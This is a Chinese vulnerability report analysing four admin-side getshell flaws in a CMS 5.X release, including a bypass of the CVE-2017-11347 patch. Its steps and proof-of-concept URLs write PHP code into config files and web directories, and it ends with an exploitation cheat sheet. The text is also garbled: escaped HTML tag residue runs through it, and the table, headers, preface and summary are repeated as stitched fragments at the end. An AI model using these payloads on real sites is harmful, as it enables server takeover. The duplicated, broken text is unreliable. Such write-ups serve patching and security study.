某CMS 5.X版本GETSHELL漏洞合集分析报告<\/h1>

0x00 前言<\/h2>
某CMS在2018年1月底发布了6.0版本，修复了5.X版本中存在的多个后台Getshell漏洞。本报告将详细分析这些漏洞的利用方式和原理。<\/p>

0x01 安装过程过滤不严导致Getshell<\/h2>

漏洞前提<\/h3>

有删除

\/config\/install.lock<\/code>文件的权限<\/li>
<\/ul>
漏洞利用步骤<\/h3>


利用任意文件删除漏洞删除install.lock<\/strong><\/p>

漏洞文件：\/admin\/app\/batch\/csvup.php<\/code><\/li>
POC：
http:\/\/xxx.com\/admin\/app\/batch\/csvup.php?fileField=1_1231-1&flienamecsv=config\/install.lock
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>

重装时利用数据库配置文件过滤不当<\/strong><\/p>

漏洞文件：\/install\/index.php<\/code><\/li>
可控参数：$db_host<\/code>, $db_username<\/code>, $db_pass<\/code>, $db_name<\/code>, $db_prefix<\/code><\/li>
利用方式：在数据库配置时将任意参数设置为*\/phpinfo();\/*<\/code><\/li>
生成的shell地址：http:\/\/xxx.com\/config\/config_db.php<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
0x02 CVE-2017-11347补丁绕过继续Getshell<\/h2>
漏洞前提<\/h3>

Windows服务器<\/li>
知道网站绝对路径（至少知道网站index.php所在目录的上一级目录名）<\/li>
<\/ul>
绝对路径获取方法<\/h3>

访问\/install\/phpinfo.php<\/code><\/li>
查看以下文件的报错信息（需查看网页源码）：

\/app\/system\/include\/public\/ui\/admin\/top.php<\/code><\/li>
\/app\/system\/include\/public\/ui\/admin\/box.php<\/code><\/li>
\/app\/system\/include\/public\/ui\/web\/sidebar.php<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用步骤<\/h3>

上传包含恶意代码的ico文件（如<?php phpinfo();?><\/code>）<\/li>
构造payload（注意斜杠方向）：
http:\/\/localhost\/admin\/app\/physical\/physical.php?action=op&op=3&valphy=test|\/..\upload\file\1506587082.ico\www\about\shell.php|1
<\/code><\/pre>

其中www<\/code>需替换为网站index.php的上一级目录名<\/li>
<\/ul>
<\/li>
生成的shell地址：http:\/\/localhost\/about\/shell.php<\/code><\/li>
<\/ol>
0x03 Copyindx函数处理不当Getshell<\/h2>
漏洞特点<\/h3>

不同于CVE-2017-11347漏洞<\/li>
利用的是Copyindex函数而非Copyfile<\/li>
不需要上传图片<\/li>
可结合CSRF实现一键Getshell<\/li>
<\/ul>
漏洞利用<\/h3>

漏洞文件：admin\/app\/physical\/physical.php<\/code><\/li>
触发条件：$action=op<\/code>且$op=3<\/code>且$fileaddr[1]="index.php"<\/code><\/li>
POC：
http:\/\/localhost\/admin\/app\/physical\/physical.php?action=op&op=3&valphy=xxx\/index.php|phpinfo();
<\/code><\/pre>
<\/li>
生成的shell地址：http:\/\/localhost\/xxx\/index.php<\/code><\/li>
<\/ul>
0x04 olupdate文件缺陷导致Getshell<\/h2>
漏洞利用步骤<\/h3>

构造特殊请求：
\/admin\/system\/olupdate.php?action=sql&sqlfile=1&string=<?php phpinfo();?>&addr=shell_dir&tableid=1000
<\/code><\/pre>

tableid<\/code>需≥44（建议设为1000）<\/li>
addr<\/code>参数指定shell存放目录<\/li>
<\/ul>
<\/li>
生成的shell地址：http:\/\/xxx.com\/admin\/update\/shell_dir\/sqlist.php<\/code><\/li>
<\/ol>
0x05 总结<\/h2>
所有漏洞都需要后台管理员权限才能利用，但危害较大。建议用户尽快升级到6.0及以上版本以修复这些安全问题。<\/p>
漏洞修复建议<\/h3>

对所有用户输入进行严格过滤<\/li>
限制文件操作函数的参数<\/li>
对配置文件写入操作进行内容检查<\/li>
升级到最新版本CMS<\/li>
<\/ol>
附录：漏洞利用速查表<\/h2>



漏洞类型<\/th>
利用文件<\/th>
关键参数<\/th>
生成shell路径<\/th>
<\/tr>
<\/thead>


安装过滤不严<\/td>
\/install\/index.php<\/td>
数据库配置参数<\/td>
\/config\/config_db.php<\/td>
<\/tr>

CVE-2017-11347绕过<\/td>
\/admin\/app\/physical\/physical.php<\/td>
valphy<\/td>
\/about\/shell.php<\/td>
<\/tr>

Copyindx函数漏洞<\/td>
\/admin\/app\/physical\/physical.php<\/td>
valphy<\/td>
\/自定义目录\/index.php<\/td>
<\/tr>

olupdate漏洞<\/td>
\/admin\/system\/olupdate.php<\/td>
string, addr<\/td>
\/admin\/update\/自定义目录\/sqlist.php<\/td>
<\/tr>
<\/tbody>
<\/table>

漏洞类型<\/th>	利用文件<\/th>	关键参数<\/th>	生成shell路径<\/th> <\/tr> <\/thead>
安装过滤不严<\/td>	\/install\/index.php<\/td>	数据库配置参数<\/td>	\/config\/config_db.php<\/td> <\/tr>
CVE-2017-11347绕过<\/td>	\/admin\/app\/physical\/physical.php<\/td>	valphy<\/td>	\/about\/shell.php<\/td> <\/tr>
Copyindx函数漏洞<\/td>	\/admin\/app\/physical\/physical.php<\/td>	valphy<\/td>	\/自定义目录\/index.php<\/td> <\/tr>
olupdate漏洞<\/td>	\/admin\/system\/olupdate.php<\/td>	string, addr<\/td>	\/admin\/update\/自定义目录\/sqlist.php<\/td> <\/tr> <\/tbody> <\/table>

某CMS 5.X版本GETSHELL漏洞合集分析报告<\/h1>

0x00 前言<\/h2> 某CMS在2018年1月底发布了6.0版本，修复了5.X版本中存在的多个后台Getshell漏洞。本报告将详细分析这些漏洞的利用方式和原理。<\/p>

0x01 安装过程过滤不严导致Getshell<\/h2>

0x02 CVE-2017-11347补丁绕过继续Getshell<\/h2>

0x03 Copyindx函数处理不当Getshell<\/h2>

0x04 olupdate文件缺陷导致Getshell<\/h2>

0x05 总结<\/h2> 所有漏洞都需要后台管理员权限才能利用，但危害较大。建议用户尽快升级到6.0及以上版本以修复这些安全问题。<\/p>

0x00 前言<\/h2>
某CMS在2018年1月底发布了6.0版本，修复了5.X版本中存在的多个后台Getshell漏洞。本报告将详细分析这些漏洞的利用方式和原理。<\/p>

0x05 总结<\/h2>
所有漏洞都需要后台管理员权限才能利用，但危害较大。建议用户尽快升级到6.0及以上版本以修复这些安全问题。<\/p>